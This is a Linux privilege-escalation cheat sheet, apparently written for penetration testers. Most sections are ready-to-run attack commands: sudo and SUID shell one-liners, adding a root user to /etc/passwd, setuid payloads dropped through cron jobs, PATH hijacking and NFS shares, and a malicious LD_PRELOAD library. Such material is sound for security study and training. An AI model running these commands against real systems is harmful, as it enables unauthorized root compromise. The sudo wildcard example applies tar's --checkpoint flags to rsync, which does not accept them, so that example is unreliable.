🐧Linux Privilege Escalation

Privilege Escalation refers to the process of exploiting misconfigurations, known vulnerabilities and unintended bugs in order to gain higher privileges on the target host. The final objective of this process is to gain the highest level of privileges on a target machine, achieving full compromise of that target.

External Resources

Linux Privilege Escalation:

• g0tm1lk's Basic Linux Privilege Escalation

• HackTricks - Linux Privilege Escalation

• HackTricks - Linux Privilege Escalation Checklist

• GTFOBins - Unix binaries that can be exploited

Techniques Covered

• Enumeration - System reconnaissance to identify potential attack vectors

• Programs, Jobs and Services - Exploiting misconfigured services, cron jobs, and SUID binaries

• Environment Variables Abuse - PATH variable, LD_PRELOAD and other issues

• Persistence - Maintaining access after gaining elevated privileges

Table of Contents

• Enumeration Scripts

• Kernel Exploits

• SUID/SGID Binaries

• Sudo Rights

• Cron Jobs

• Path Variable Manipulation

• NFS Shares

• Weak File Permissions

• Service Exploits

• Docker Group

• Capabilities

• LD_PRELOAD and LD_LIBRARY_PATH

Enumeration Scripts

Before trying specific techniques, it's advisable to run automated enumeration scripts to identify potential privilege escalation vectors:

LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum

curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

LSE (Linux Smart Enumeration)

curl -L https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -o lse.sh
chmod +x lse.sh
./lse.sh

pspy (Process Spy)

# 64-bit
curl -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 -o pspy64
chmod +x pspy64
./pspy64

# 32-bit
curl -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32 -o pspy32
chmod +x pspy32
./pspy32

Kernel Exploits

Identifying and exploiting kernel vulnerabilities:

1. Check kernel version:

uname -a
cat /proc/version

1. Search for known exploits:

searchsploit linux kernel [version]

1. Common kernel exploits:

   • Dirty COW (CVE-2016-5195)

   • overlayfs (CVE-2021-3493)

   • PTRACE_TRACEME (CVE-2019-13272)

Example: Exploiting Dirty COW

# Check if vulnerable
grep -q "Ubuntu 16.04" /etc/issue && echo "System might be vulnerable to Dirty COW"

# Download and compile exploit
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password123

SUID/SGID Binaries

SUID (Set User ID) and SGID (Set Group ID) binaries run with the privileges of the file owner/group:

1. Find SUID/SGID binaries:

# Find SUID binaries
find / -type f -perm -4000 -ls 2>/dev/null

# Find SGID binaries
find / -type f -perm -2000 -ls 2>/dev/null

1. Investigate each binary using GTFOBins (https://gtfobins.github.io/) to identify potential privilege escalation vectors.

Example exploits:

Using find for privilege escalation:

find . -exec /bin/sh -p \; -quit

Using nano for privilege escalation:

nano
^R^X
reset; sh 1>&0 2>&0

Using cp to overwrite sensitive files:

cp /tmp/malicious_passwd /etc/passwd

Sudo Rights

Check what commands you can run with sudo:

sudo -l

Common sudo privilege escalation vectors:

1. Running commands with sudo:

# If you can run any command as sudo
sudo -i

# If you can run vim as sudo
sudo vim -c '!sh'

# If you can run find as sudo
sudo find . -exec /bin/sh \; -quit

# If you can run python as sudo
sudo python -c 'import os; os.system("/bin/sh")'

1. Environment variables preservation with sudo (env_keep):

# If LD_PRELOAD is kept
sudo LD_PRELOAD=/path/to/malicious.so program

1. Wildcard exploitation:

# If you can run something like: sudo /usr/bin/rsync *.conf /backup/
echo 'command' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/

Cron Jobs

Identifying and exploiting vulnerable cron jobs:

1. Find cron jobs:

crontab -l
ls -la /etc/cron*
cat /etc/crontab

1. Look for writable scripts executed by cron:

find /etc/cron* -type f -writable

1. Monitor running processes to identify cron jobs:

./pspy64

Example exploitation:

# If you find a writable script run by root cron job
echo 'chmod +s /bin/bash' >> /path/to/writable/script.sh
# Wait for cron to execute
/bin/bash -p

Path Variable Manipulation

If the system uses a relative path to execute commands and the PATH variable can be manipulated:

1. Check the current PATH:

echo $PATH

1. Create a malicious binary with the same name:

cd /tmp
echo '#!/bin/bash' > service
echo 'chmod +s /bin/bash' >> service
chmod +x service

1. Modify the PATH to include your directory:

export PATH=/tmp:$PATH

1. Wait for the vulnerable script to be executed, or execute it if you have permission.

NFS Shares

Exploiting misconfigured NFS shares:

1. Check for NFS shares:

# On the target
cat /etc/exports
showmount -e localhost

# From an attacker machine
showmount -e target_ip

1. Look for shares with no_root_squash or no_all_squash options.

2. Mount the share and exploit:

# On the attacker machine
mkdir /tmp/nfs
mount -t nfs target_ip:/shared/folder /tmp/nfs
cd /tmp/nfs
echo 'int main() { setuid(0); setgid(0); system("/bin/bash"); return 0; }' > privesc.c
gcc privesc.c -o privesc
chmod +s privesc
# On the target
/shared/folder/privesc

Weak File Permissions

Check for writable sensitive files:

1. System configuration files:

find /etc -writable -type f 2>/dev/null

1. /etc/passwd writable (rare but worth checking):

ls -la /etc/passwd

# If writable, add a new root user
echo 'malicious:x:0:0::/root:/bin/bash' >> /etc/passwd
echo 'malicious::0:0::/root:/bin/bash' >> /etc/passwd
echo 'malicious:$1$xyz$SomeHashedPasswordHere:0:0::/root:/bin/bash' >> /etc/passwd

# Generate password hash
openssl passwd -1 -salt xyz password123

1. Service configuration files:

find /etc/service/ -writable 2>/dev/null

Service Exploits

Exploit misconfigured services:

1. Check for running services:

ps aux
netstat -tuln

1. Look for services running as root with writable configuration or binary files:

find / -writable -name "*.service" 2>/dev/null
find / -writable -path "/etc/systemd/system/*" 2>/dev/null

1. Check for writable service binaries:

for SRV in $(systemctl list-unit-files --type=service | grep enabled | awk '{print $1}'); do
  EXEC=$(systemctl show -p ExecStart $SRV | cut -d '=' -f 2)
  ls -la $EXEC 2>/dev/null | grep -v ' root root '
done

Docker Group

If the user is part of the docker group:

id
# Check if user is in docker group

# Mount root filesystem and gain root
docker run -it --rm -v /:/mnt alpine chroot /mnt sh

Capabilities

Check for binaries with dangerous capabilities:

getcap -r / 2>/dev/null

Example exploitation of capabilities:

# If python has cap_setuid capability
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

LD_PRELOAD and LD_LIBRARY_PATH

If you can control LD_PRELOAD or LD_LIBRARY_PATH when running a SUID binary:

1. Create a malicious shared library:

cat << EOF > /tmp/evil.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    exit(0);
}
EOF

gcc -fPIC -shared -o /tmp/evil.so /tmp/evil.c -nostartfiles

1. Use LD_PRELOAD to load the malicious library:

sudo LD_PRELOAD=/tmp/evil.so program

1. Alternatively, use LD_LIBRARY_PATH to point to a directory with malicious libraries:

LD_LIBRARY_PATH=/tmp program

Resources

• GTFOBins

• PayloadsAllTheThings - Linux Privilege Escalation

• HackTricks - Linux Privilege Escalation

• g0tmi1k's Basic Linux Privilege Escalation